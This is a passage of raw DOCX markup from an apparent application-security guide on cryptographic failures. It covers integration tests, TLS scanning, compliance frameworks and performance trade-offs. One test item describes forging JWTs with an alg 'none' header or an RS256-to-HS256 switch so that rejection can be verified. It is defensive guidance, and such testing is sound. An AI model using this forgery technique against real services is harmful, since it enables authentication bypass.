    <w:p w14:paraId="3C27BE58"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Integration tests should actively attempt to break the cryptographic validation layer to ensure it behaves securely under adversarial conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE0012" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Token Verification Regression Test:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> For applications utilizing JWTs or API tokens, write an integration test that crafts a malicious payload with the header modified to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>alg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>": "none"}</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or switches the algorithm from an asymmetric algorithm to a symmetric one ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>RS256</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>HS256</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). The test must assert that the API gateway or authentication filter explicitly rejects the token with an HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>401 Unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315A508" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IV Reuse Block Test:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write a test case that forces two concurrent encryption requests using identical data. Assert that the resulting ciphertexts are completely unique, proving that the Initialization Vector (IV) is dynamically changing and non-repeating for every transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1068EC5D"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3. Infrastructure and Network Automation Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24407810"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Automate the verification of transport layer protections within the continuous integration/continuous deployment (CI/CD) pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584AD434" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Automated TLS Scan:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrate linting or scanning utilities like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>testssl.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zap</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the deployment pipeline to programmatically connect to the target environment. The test should assert that connecting via TLS 1.0 or TLS 1.1 returns a connection failure, and that the server explicitly presents a valid </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Strict-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>TransportSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> header with an expiration value greater than zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BBB94A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Compliance Standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C02306"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 xml:space="preserve">Because cryptographic failures directly jeopardize the confidentiality and integrity of protected data, nearly every major global regulatory framework </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>mandates</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> strict controls, auditing procedures, and rigorous testing for encryption systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C808A"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1. PCI DSS v4.0 (Payment Card Industry Data Security Standard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ABDC11"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PCI DSS maintains some of the most prescriptive requirements regarding cryptography due to its focus on protecting primary account numbers (PAN) and cardholder data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092638EB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Requirement 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Focuses entirely on the protection of stored account data. It mandates that PAN must be rendered unreadable anywhere it is stored using strong cryptography, secure keys, and robust key management processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A625774" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Requirement 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dictates that cardholder data must be encrypted with strong cryptography and security protocols during transmission across open, public networks (e.g., enforcing TLS 1.2/1.3 and prohibiting weak ciphers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C1CCF0"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2. NIST SP 800-53 (National Institute of Standards and Technology)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADFFE30"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For systems handling federal information or organizations aligning with US government standards, NIST specifies rigid cryptographic baselines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E273999" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SC-13 (Cryptographic Protection):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Demands that the organization implements cryptographic mechanisms using approved standards (e.g., FIPS 140-3 validated cryptographic modules) to protect information at rest and in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D98B54" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SC-28 (Protection of Information at Rest):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explicitly requires the implementation of mechanisms to protect the confidentiality and integrity of information residing on storage devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C31352"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3. SOC 2 (System and Organization Controls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C909BA"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 xml:space="preserve">Evaluated through the lens of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Confidentiality</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trust Services Criteria (TSC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028715B7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CC6.1 / CC6.7:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auditors assess whether data transmission pathways are adequately secured using encryption protocols to prevent unauthorized intercept, and whether access to encryption keys is structurally restricted to authorized systems and individuals according to the principle of least privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1358CBC0"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4. ISO/IEC 27001:2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D360E"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The international standard for Information Security Management Systems (ISMS) embeds cryptographic enforcement natively into its structural controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F957F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Control A.8.24 (Use of Cryptography):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mandates that organizations establish and enforce a clear policy on the use of cryptographic controls for protecting information, supported by effective key management rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6FDE1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Control A.8.20 (Network Security):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires network transmission controls to secure data flowing across application boundaries, heavily relying on verified transport layer encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B768B4A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Operational &amp; Team Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA54BF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The "Fix" Trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56220C6F"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lastRenderedPageBreak/>
        <w:t>Implementing ironclad cryptographic protections involves a direct engineering trade-off between maximizing computational security and minimizing application latency and operational complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7343F1A3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Performance Trade-offs (Latency &amp; Compute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1099E8F6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Adaptive Password Hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using algorithms like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Argon2id</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is intentionally resource-intensive to prevent GPU-accelerated brute-forcing. Increasing the "work factor" or memory configuration means the server takes significantly longer (e.g., 200ms to 500ms) to compute a single hash. If an application experiences a massive spike in login traffic or a distributed denial-of-service (DDoS) attack targeting the authentication endpoint, the CPU can rapidly bottleneck, degrading the entire system's performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8AEAD3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Network Handshake Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforcing TLS 1.3 or highly complex cipher suites introduces cryptographic overhead during the initial handshake phase. While TLS 1.3 reduces round-trips compared to legacy versions, requiring deep certificate validation, checking Online Certificate Status Protocols (OCSP), or deploying mutual TLS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>mTLS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) across microservices adds a few milliseconds of latency to every network connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F891B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Balancing Security with Usability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1B8C61" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Asynchronous Hashing / Dedicated Auth Servers:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> To prevent slow password hashing from dragging down user-facing application threads, offload authentication processing to dedicated identity microservices or isolated containers. This protects core business functions from CPU starvation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5283A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
